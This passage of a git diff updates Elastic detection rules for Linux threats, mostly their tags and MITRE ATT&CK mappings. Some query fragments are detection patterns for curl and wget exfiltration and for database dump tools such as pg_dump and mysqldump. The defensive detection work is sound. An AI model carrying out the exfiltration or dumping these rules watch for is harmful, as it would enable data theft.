"https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "host.id"] diff --git a/rules/linux/execution_unusual_path_invocation_from_command_line.toml b/rules/linux/execution_unusual_path_invocation_from_command_line.toml index 7c4599b99b1..f5547ab6045 100644 --- a/rules/linux/execution_unusual_path_invocation_from_command_line.toml +++ b/rules/linux/execution_unusual_path_invocation_from_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -45,15 +45,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -113,33 +105,19 @@ In Linux environments, shell processes like bash or zsh execute commands, often framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_unusual_pkexec_execution.toml b/rules/linux/execution_unusual_pkexec_execution.toml index 0b613bb5b67..a08462182ae 100644 --- a/rules/linux/execution_unusual_pkexec_execution.toml +++ b/rules/linux/execution_unusual_pkexec_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -94,17 +94,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -125,28 +115,14 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.command_line"] diff --git a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml index d26ede83d7b..eba84332571 100644 --- a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml +++ b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,12 +113,17 @@ process.name == "curl" and ?process.parent.executable != null and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" - [[rule.threat.technique]] - name = "Exfiltration Over Alternative Protocol" - id = "T1048" - reference = "https://attack.mitre.org/techniques/T1048/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml index 89aa348f4dd..6f2664a7726 100644 --- a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml +++ b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -124,6 +124,11 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1030" +name = "Data Transfer Size Limits" +reference = "https://attack.mitre.org/techniques/T1030/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/linux/exfiltration_potential_database_dumping.toml b/rules/linux/exfiltration_potential_database_dumping.toml index c09a96d5d71..4df9e8bea27 100644 --- a/rules/linux/exfiltration_potential_database_dumping.toml +++ b/rules/linux/exfiltration_potential_database_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/13" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -51,16 +51,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -72,12 +63,12 @@ process.name in ("pg_dump", "pg_dumpall", "mysqldump", "mariadb-dump", "mongodum [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" - [[rule.threat.technique]] - name = "Exfiltration Over Alternative Protocol" - id = "T1048" - reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml index e0f16b19169..d978c2aee6c 100644 --- a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml +++ b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,12 +122,12 @@ process.name == "wget" and ?process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" - [[rule.threat.technique]] - name = "Exfiltration Over Alternative Protocol" - id = "T1048" - reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml index f6d821c4711..1e50445591e 100644 --- a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml +++ b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,15 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -171,15 +163,12 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/impact_memory_swap_modification.toml b/rules/linux/impact_memory_swap_modification.toml index 2336a398314..f6ef7c656b6 100644 --- a/rules/linux/impact_memory_swap_modification.toml +++ b/rules/linux/impact_memory_swap_modification.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,18 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Impact", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -125,21 +114,3 @@ reference = "https://attack.mitre.org/techniques/T1496/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/impact_potential_bruteforce_malware_infection.toml b/rules/linux/impact_potential_bruteforce_malware_infection.toml index 93c5361d32a..6f8a2777a56 100644 --- a/rules/linux/impact_potential_bruteforce_malware_infection.toml +++ b/rules/linux/impact_potential_bruteforce_malware_infection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,16 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Impact", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -166,42 +157,11 @@ from logs-endpoint.events.network-* metadata _id, _index, _version framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1496" -name = "Resource Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/" +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/initial_access_first_time_public_key_authentication.toml b/rules/linux/initial_access_first_time_public_key_authentication.toml index 1e74cf2cb47..9bc8e27141c 100644 --- a/rules/linux/initial_access_first_time_public_key_authentication.toml +++ b/rules/linux/initial_access_first_time_public_key_authentication.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,14 +82,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -99,16 +92,33 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["system.auth.ssh.signature"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml index d1e0215d442..75bb96d09b0 100644 --- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,14 +75,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -92,16 +85,33 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["related.ip"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml index ffc5417fe60..6abae46e1a9 100644 --- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,14 +59,7 @@ SSH (Secure Shell) is a protocol used to securely access and manage Linux system risk_score = 21 rule_id = "5b8d7b94-23c6-4e3f-baed-3a4d0da4f19d" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -76,16 +69,33 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["related.user"] diff --git a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml index 159ac1545b7..56abd0cda0b 100644 --- a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml +++ b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/24" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,19 +76,7 @@ references = [ risk_score = 99 rule_id = "ab7795cc-0e0b-4f9d-a934-1f17a58f869a" severity = "critical" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne" -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Resources: Investigation Guide", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" @@ -101,26 +89,13 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/linux/lateral_movement_kubeconfig_file_activity.toml b/rules/linux/lateral_movement_kubeconfig_file_activity.toml index 742506ac792..7f53f2f17ee 100644 --- a/rules/linux/lateral_movement_kubeconfig_file_activity.toml +++ b/rules/linux/lateral_movement_kubeconfig_file_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,19 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Defense Evasion", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Data Source: Elastic Defend for Containers", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -126,37 +114,16 @@ file where host.os.type == "linux" and event.type != "deletion" and file.path li framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/lateral_movement_ssh_it_worm_download.toml b/rules/linux/lateral_movement_ssh_it_worm_download.toml index d7738588cf4..a7ae98d712e 100644 --- a/rules/linux/lateral_movement_ssh_it_worm_download.toml +++ b/rules/linux/lateral_movement_ssh_it_worm_download.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/21" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,18 +86,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,26 +101,11 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml index 40cf153f80e..23ddb98d3b1 100644 --- a/rules/linux/lateral_movement_telnet_network_activity_external.toml +++ b/rules/linux/lateral_movement_telnet_network_activity_external.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,15 +98,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by process.entity_id @@ -125,11 +117,11 @@ sequence by process.entity_id framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = 